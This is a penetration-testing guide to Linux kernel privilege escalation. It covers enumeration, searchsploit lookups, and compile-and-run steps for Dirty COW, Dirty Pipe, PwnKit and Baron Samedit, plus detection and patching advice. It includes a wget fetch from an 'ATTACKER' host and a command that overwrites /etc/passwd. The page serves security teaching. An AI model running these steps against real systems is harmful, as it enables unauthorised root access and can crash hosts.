Linux Kernel Exploits
Guide to identifying and exploiting Linux kernel vulnerabilities for privilege escalation, including enumeration techniques, common exploits, and safety considerations.
Introduction
Kernel exploits target vulnerabilities in the Linux kernel itself, providing a direct path to root privileges. While other privilege escalation techniques exploit misconfigurations, kernel exploits leverage actual software vulnerabilities in the most privileged code on the system.
Use With Caution
Kernel exploits carry significant risk:
- System crashes - Failed exploits can cause kernel panics
- Data corruption - Memory corruption can damage filesystems
- Detection - Kernel crashes generate obvious alerts
- Instability - Even successful exploits may leave systems unstable
Always get explicit permission before using kernel exploits, and prefer other escalation methods when available.
Enumeration
System Information
# Kernel version
uname -a
Linux target 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
# OS release
cat /etc/os-release
cat /etc/lsb-release
# Architecture
uname -m
archAutomated Enumeration
# Linux Exploit Suggester
./linux-exploit-suggester.sh
# Linux Exploit Suggester 2
python linux-exploit-suggester-2.py
# LinPEAS kernel section
./linpeas.sh | grep -A 20 "Kernel"Finding Exploits
Manual Search
# Search Exploit-DB
searchsploit linux kernel 4.4 privilege escalation
# Search by specific version
searchsploit linux kernel 4.4.0Common Resources
| Resource | URL |
|---|---|
| Exploit-DB | https://www.exploit-db.com |
| Linux Exploit Suggester | https://github.com/mzet-/linux-exploit-suggester |
| CVE Details | https://www.cvedetails.com |
Notable Kernel Exploits
Dirty COW (CVE-2016-5195)
Affected: Linux Kernel 2.6.22 - 4.8.3
Race condition in copy-on-write mechanism allowing write access to read-only memory mappings.
# Compile
gcc -pthread dirty.c -o dirty -lcrypt
# Run
./dirtyDirty Pipe (CVE-2022-0847)
Affected: Linux Kernel 5.8 - 5.16.11
Pipe buffer flag manipulation allowing arbitrary file overwrites.
# Compile
gcc exploit.c -o exploit
# Overwrite /etc/passwd
./exploit /etc/passwd 1 "$(cat payload)"PwnKit (CVE-2021-4034)
Affected: Polkit (pkexec) - Most Linux distributions
Memory corruption in pkexec allowing local privilege escalation.
# Compile and run
gcc pwnkit.c -o pwnkit
./pwnkitSudo Baron Samedit (CVE-2021-3156)
Affected: Sudo 1.8.2 - 1.8.31p2, 1.9.0 - 1.9.5p1
Heap buffer overflow in sudo's argument parsing.
# Check vulnerability
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# If it crashes, likely vulnerable
# Run exploit
./exploitExploitation Workflow
1. Identify Kernel Version
uname -r
4.4.0-116-generic2. Search for Exploits
searchsploit linux kernel 4.4.0
# or
searchsploit "linux kernel 4.4" | grep -i "privilege"3. Download and Transfer
# On attacker
searchsploit -m 40839
python3 -m http.server 8000
# On target
wget http://ATTACKER:8000/40839.c4. Compile
# Simple compilation
gcc exploit.c -o exploit
# With specific flags (check exploit comments)
gcc -pthread exploit.c -o exploit -lcrypt5. Execute
./exploit
# id
uid=0(root) gid=0(root) groups=0(root)Cross-Compilation
If the target lacks a compiler:
# On attacker (compile for target architecture)
# For 64-bit target
gcc -m64 exploit.c -o exploit64
# For 32-bit target
gcc -m32 exploit.c -o exploit32
# Static compilation (no library dependencies)
gcc -static exploit.c -o exploitSafety Considerations
Before Running
- Backup critical data if possible
- Test in lab with matching kernel version
- Read the exploit code - understand what it does
- Check for safer alternatives (sudo, SUID, cron, etc.)
During Engagement
- Document kernel version before attempting
- Have recovery plan for system crashes
- Notify client of risks before running
- Avoid production systems if possible
Common Failure Modes
- Kernel panic - System crashes, requires reboot
- Segmentation fault - Exploit failed, may be wrong version
- No effect - Kernel may be patched
- Partial success - Elevated but unstable
Detection and Forensics
Indicators
- Kernel crash logs in
/var/log/kern.log - Suspicious compiled binaries in
/tmp - Unusual process memory patterns
- Core dumps from crashes
Mitigation
# Check kernel version and patches
apt list --installed | grep linux-image
# Apply security updates
apt update && apt upgrade
# Enable kernel hardening
# /etc/sysctl.conf
kernel.dmesg_restrict = 1
kernel.kptr_restrict = 2Related Resources
- Sudo Misconfigurations - Safer privilege escalation
- Linux Capabilities - Capability-based escalation
- Privileged Groups - Group-based escalation
References
MITRE ATT&CK Techniques
- T1068 - Exploitation for Privilege Escalation - Primary kernel exploitation technique
- T1014 - Rootkit - Post-exploitation kernel-level persistence
Vulnerabilities
- CVE-2016-5195 - Dirty COW - Race condition in copy-on-write
- CVE-2022-0847 - Dirty Pipe - Pipe buffer flag manipulation
- CVE-2021-4034 - PwnKit - Polkit pkexec vulnerability
- CVE-2021-3156 - Baron Samedit - Sudo heap overflow
Security Resources
- Linux Exploit Suggester - Kernel exploit enumeration tool
- Dirty COW - Original vulnerability page
- Dirty Pipe Explained - Technical writeup
- Exploit-DB - Exploit database
Last updated on
Linux Capabilities Exploitation: Breaking Traditional Privilege Models
Technical guide to exploiting Linux capabilities for privilege escalation, focusing on dangerous capabilities like CAP_DAC_OVERRIDE, CAP_SYS_ADMIN, and CAP_SETUID.
Logrotate Exploitation
Guide to exploiting logrotate misconfigurations for privilege escalation using race conditions and the logrotten exploit.